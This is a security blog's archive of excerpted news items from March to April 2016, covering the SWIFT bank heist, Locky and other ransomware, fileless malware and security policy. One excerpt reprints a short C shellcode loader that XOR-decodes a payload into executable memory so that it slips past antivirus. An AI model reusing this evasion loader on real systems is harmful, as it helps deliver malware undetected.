Doug Vitale Tech Blog

March – April 2016 News Archive

Hackers’ $81 Million Sneak Attack on World Banking

New York Times, 30 Apr 2016 – What enabled one of the most brazen digital bank heists ever is a ubiquitous and highly trusted international bank messaging system called Swift. Swift — the Society for Worldwide Interbank Financial Telecommunication — is billed as a supersecure system that banks use to authorize payments from one account to another. But last week, for the first time since hackers captured $81 million from Bangladesh’s central bank in February, Swift acknowledged that the thieves have tried to carry out similar heists at other banks on its network by sneaking into the beating heart of the global banking system. [More]

Hitting back at hackers

The Australian, 29 Apr 2016 – Last week the Prime Minister Malcolm Turnbull launched a new cyber security strategy to meet “the dual challenges of the digital age — advancing and protecting our interests online” and announced $230 million in government funding for 33 new initiatives that would result in 100 new jobs to “boost the government’s cybersecurity capacity and capabilities.” [More]

PCI Standard Adds Multi-Factor Authentication Requirements

InfoSecurity, 29 Apr 2016 – One significant change in PCI DSS 3.2 is that it includes multi-factor authentication as a requirement for any personnel with administrative access into environments handling card data. Previously this requirement applied only to remote access from untrusted networks. [More]

New Attack Technique Hides Spread of RATs in Asia

TechNewsWorld, 27 Apr 2016 – entinelOne last week announced that it has detected a technique being used in Asia to infect systems with remote access Trojans that ensures that the payload remains in memory throughout its execution and doesn’t touch the victim’s computer disk in an unencrypted state. Attackers remain hidden from antivirus technologies and next-generation technologies that focus only on file-based threats, according to SentinelOne. The samples analyzed also can detect the presence of a virtual machine, preventing them from being analyzed in a network sandbox. [More]

Ransomware is the future

CSO Online, 19 Apr 2016 – If you’ve been keeping up with the news lately, you’ve probably heard about the explosion of the ransomware strain known as Locky. Locky is a very aggressive type of malware that encrypts files on a victim’s computers and crawls through network shares that are accessible to the victim. It is typically delivered by macros inside of Microsoft Word documents sent through email. When recipients open the Word document, they are prompted to enable macros, and when they do, the ransomware embedded in the macro executes and infects the victim’s computer. [More]

Why Cloud Security is essential for the success of Internet of Things

CloudWedge, 18 Apr 2016 – The integration of Internet of Things (IoT) into daily lives is a hot topic for the consumer market with smart home appliances, smart phones and wearables all communicating with each other to create one network of connected systems. In a similar fashion the the business-to-business (B2B) application of IoT technology presents a huge potential to change the way companies operate and create products. Not limited to large organizations IoT can be found in many sectors, including government (smart parking, lighting and watering, environmental monitoring, traffic management), manufacturing (supply chain optimization, robotics, RFID and logistics. industrial control systems), healthcare (bedside monitoring, telemedicine, implantable devices), amongst others. [More]

Hyping vulnerabilities is no longer helping awareness

TechCrunch, 11 Apr 2016 – It used to be a vulnerability was disclosed, a few people who paid attention to such things blogged about it, patches were made, and we went about our day. Then Heartbleed happened. It was a big deal. It disrupted productivity, caused breaches and shone the light on the fact that open source components are increasing risk in the application layer. Major media outlets covered the news, and the public began to better understand the need for application security. [More]

A Whole Lot of Nitwits Will Plug a Random USB Into Their Computer

Motherboard, 6 Apr 2016 – Using booby-trapped USB flash drives is a classic hacker technique. But how effective is it really? A group of researchers at the University of Illinois decided to find out, dropping 297 USB sticks on the school’s Urbana-Champaign campus last year. As it turns out, it really works. [More]

Server software poses soft target for ransomware

ComputerWorld, 5 Apr 2016 – An alternate method for infecting computers with ransomware signals a shift in tactics by cybercriminals that could put businesses at greater risk, according to Symantec. A type of ransomware called Samsam has been infecting organizations but is not installed in the usual way. [More]

5 Ways Cyber Experts Think the FBI Might Have Hacked the iPhone

IEEE Spectrum, 5 Apr 2016 – Last week, the FBI announced that it had, with the help of a third party, successfully broken into the passcode-protected iPhone 5C owned by San Bernardino shooter Syed Farook. The agency hasn’t named its accomplice nor has it revealed how it gained access to the iPhone’s contents. [More]

Malware Attacks On Hospitals Put Patients At Risk

NPR, 1 Apr 2016 – malware attacks have left the 14 hospitals — 10 of which are part of the MedStar hospital group — unable to access patient data and, in some cases, having to turn patients away. [More]

Execs: We’re not responsible for cybersecurity

Yahoo Finance, 1 Apr 2016 – More than 90 percent of corporate executives said they cannot read a cybersecurity report and are not prepared to handle a major attack, according to a new survey. More distressing is that 40 percent of executives said they don’t feel responsible for the repercussions of hackings, said Dave Damato, chief security officer at Tanium, which commissioned the survey with the Nasdaq. [More]

New wireless tech promises password-free Wi-Fi

NetworkWorld, 31 Mar 2016 – New wireless technology developed by researchers at MIT’s Computer Science and Artificial Intelligence Lab promises to kill the Wi-Fi password at last. Dubbed Chronos, the new system enables a single Wi-Fi access point to locate users to within tens of centimeters without relying on any external sensors. What that means is that it could figure out where people are in a home or office and adjust heating and cooling accordingly. It could also enable a small cafe to better restrict its free Wi-Fi to paying customers. [More]

71% Of People Globally Think The Dark Net Should Be Shut Down

Forbes, 31 Mar 2016 – More than 70% of people globally think that the “dark net” should be shut down, according to a new survey. The Center for International Governance Innovation (CIGI), a Canadian think tank, surveyed more than 24,000 Internet users in two dozen countries between November 20, 2015 and December 4, 2015. It found that worldwide, popular opinion is against the dark net and services that allow people to maintain anonymity in their online activity. [More]

Linux at 25: Q&A With Linus Torvalds

IEEE Spectrum, 29 Mar 2016 – Linus Torvalds created the original core of the Linux operating system in 1991 as a computer science student at the University of Helsinki in Finland. Linux rapidly grew into a full-featured operating system that can now be found running smartphones, servers, and all kinds of gadgets. In this e-mail interview, Torvalds reflects on the last quarter century and what the next 25 years might bring. [More]

EC-Council website caught spreading crypto ransomware

ArsTechnica, 24 Mar 2016 – Like so many drive-by attack campaigns, the one hitting the EC-Council is designed to be vexingly hard for researchers to replicate. It targets only visitors using Internet Explorer and then only when they come to the site from Google, Bing, or another search engine. Even when these conditions are met, people from certain IP addresses—say those in certain geographic locales—are also spared. The EC-Council pages of those who aren’t spared then receive embedded code that redirects the browser to a chain of malicious domains that host the Angler exploits. [More]

Ransomware is the future

BlueSoul, 18 Mar 2016 – Ransomware-as-a-service is a real thing you can buy, some variants have live chat support to receive payment, and we routinely see new versions with bugfixes and feature-adds. One of the last major flaws in ransomware, the inability to enumerate non-mapped network shares, was overcome in the latest Locky build that calls WNetOpenEnum() to attempt to traverse every share on the network. [More]

Documents with malicious macros deliver fileless malware

ComputerWorld, 14 Mar 2016 – Spammed Word documents with malicious macros have become a popular method of infecting computers over the past few months. Attackers are now taking it one step further by using such documents to deliver fileless malware that gets loaded directly in the computer’s memory. Security researchers from Palo Alto Networks analyzed a recent attack campaign that pushed spam emails with malicious Word documents to business email addresses from the U.S., Canada and Europe. The emails contained the recipients’ names as well as specific information about the companies they worked for, which is not typical of widespread spam campaigns. [More]

Bypassing Antivirus With Ten Lines of Code

Attactics, 14 Mar 2016 – #include
int main(int argc, char **argv) {
char b[] = {/* your XORd with key of ‘x’ shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ ‘x’;}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
} [More]

Ransomware Rising – Criakl, OSX, and others

PhishMe, 10 Mar 2016 – Over the last few months, the Phishing Intelligence team has observed a huge increase of ransomware. Many attackers are starting to experiment with ransomware as an alternative to quickly monetize. Dridex has employed a new family of ransomware named Locky, which is a pretty drastic shift in what this group is known for doing. We’re even seeing attackers go after OSX with ransomware, something that was once thought to be immune from malware, however there were nearly 6,500 users who downloaded the compromised BitTorrent client. [More]

Locky ransomware activity ticks up

Network World, 9 Mar 2016 – Locky, a new family of ransomware that emerged in the last few weeks, has quickly made a mark for itself. Computer security companies say it has become a commonly seen type of ransomware, which is used to hold a computer’s files hostage pending a ransom payment. Trustwave’s SpiderLabs said on Wednesday that 18 percent of 4 million spam messages it collected in the last week were ransomware-related, including many linked to Locky. [More]

The human firewall cannot be fixed, says McAfee CTO

CSO Online, 9 Mar 2016 – How would you fix the human firewall?
Well you cannot. We each have subconscious levers that can be used to influence. These are what criminals use within modern spear phishing emails, and is intended to tap into our subconscious to influence our behaviors. What I find remarkable is that these tricks are being used within emails bombarding our inboxes; in fact it’s not just email, they are coming in via multiple channels. [More]

First Fully Functional Mac Ransomware Contained Before It Could Cause Havoc

Dark Reading, 7 Mar 2016 – The first fully functional ransomware for Mac OS X has been discovered in the wild, but was contained before it did damage. The new ransomware, “KeRanger,” found by Palo Alto Networks’ Unit 42, is completely capable. KeRanger bypasses Apple’s Gatekeeper — the tool that prevents unsigned code from running on Mac operating systems — by piggy-backing on an infected version of Transmission, an open-source BitTorrent client, which is signed with a valid Mac application developer’s certificate. [More]

Data Is a Toxic Asset

Scneier, 4 Mar 2016 – Thefts of personal information aren’t unusual. Every week, thieves break into networks and steal data about people, often tens of millions at a time. Most of the time it’s information that’s needed to commit fraud, as happened in 2015 to Experian and the IRS. Sometimes it’s stolen for purposes of embarrassment or coercion, as in the 2015 cases of Ashley Madison and the US Office of Personnel Management. The latter exposed highly sensitive personal data that affects security of millions of government employees, probably to the Chinese. Always it’s personal information about us, information that we shared with the expectation that the recipients would keep it secret. And in every case, they did not. [More]

Treat Data Security Like Firefighting

Digg, 3 Mar 2016 – Warning to enterprises: Patch all Linux systems immediately against the flaw in the GNU C Library – “glibc” – which affects millions of devices, and which could allow hackers to remotely exploit code on all vulnerable systems. That’s the advice from Dan Kaminsky, chief scientist at anti-malware firm White Ops. [More]

Why encryption isn’t evil

Certification Mag, 2 Mar 2016 – In the past few months, deadly terrorist attacks rocked San Bernardino, CA and shattered the French capital city of Paris. The technical investigation following both incidents largely focused on questions regarding digital communication and coordination among the attackers using standard encryption protocols to avoid eavesdropping by law enforcement and intelligence organizations. Encryption is already a hot-button topic in cybersecurity. These dramatic breaches of public safety have sparked a worldwide debate regarding the widespread use of encryption, and its role in barring government access to private communications. There’s one bottom line question: Is encryption a sinister tool being used serve nefarious ends? [More]

Pentagon Launches the Feds’ First ‘Bug Bounty’ for Hackers

Digg, 2 Mar 2016 – On Wednesday the Department of Defense announced that it’s launching a “Hack the Pentagon” pilot program to pay independent security researchers who disclose bugs in the Pentagon’s public-facing websites, and to eventually roll out the initiative to the DoD’s less public targets including its applications and even its networks. [More]

The IRS is using a system to protect victims of a hack—and it was just hacked

Quartz, 1 Mar 2016 – To protect the victims of the data breach from further harm, the IRS provided them with “Identity Protection PINs”. The PINs are secret codes which those taxpayers now have to put on all of their tax returns, or the IRS won’t accept them. For this master plan to work, though, the IRS would also have to keep the PINs secret. Unfortunately, it seems the agency is having some trouble with that. [More]


Written by Doug Vitale

May 21, 2016 at 10:13 PM

%d bloggers like this: